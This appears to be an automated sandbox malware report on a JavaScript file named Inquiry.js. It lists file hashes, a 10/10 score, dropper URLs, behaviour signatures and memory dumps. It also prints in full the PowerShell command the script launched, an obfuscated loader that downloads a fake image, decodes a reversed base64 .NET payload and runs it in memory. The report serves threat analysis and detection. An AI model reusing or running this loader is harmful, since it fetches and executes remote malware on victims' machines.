Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    15-01-2025 08:59

General

  • Target

    Inquiry.js

  • Size

    162KB

  • MD5

    459f759046d6def3f4524d28eab22476

  • SHA1

    46af0da70b77d98d4773023554dacc1f968b93a1

  • SHA256

    70a82edf7f26167e6b7df16d624d29d45fd220bb47b8407bc58ee6f7b8c822d3

  • SHA512

    f440b3263f621ddc3113084c7aa8a9acc876c19c97138f0c923d2a65f30203d3d4141f49bf0997b9426f60c42f667094d74e0e3f8fff2fabebf938fdd0cdf264

  • SSDEEP

    1536:DCd0yFOp29X3u7EWFOm3xE7E9GQ0c4RTXN4uzQ6VJYCkR5O+6puYszWTC4mKcAWy:DCdTFOE9OoWlN0XJzQ6VPk7yx

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\Inquiry.js
    1⤵
    • Blocklisted process makes network request
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2732

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2732-15-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

    Filesize

    4KB

  • memory/2732-16-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2732-17-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

  • memory/2732-18-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2732-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2732-20-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2732-21-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2732-22-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2732-23-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

    Filesize

    9.6MB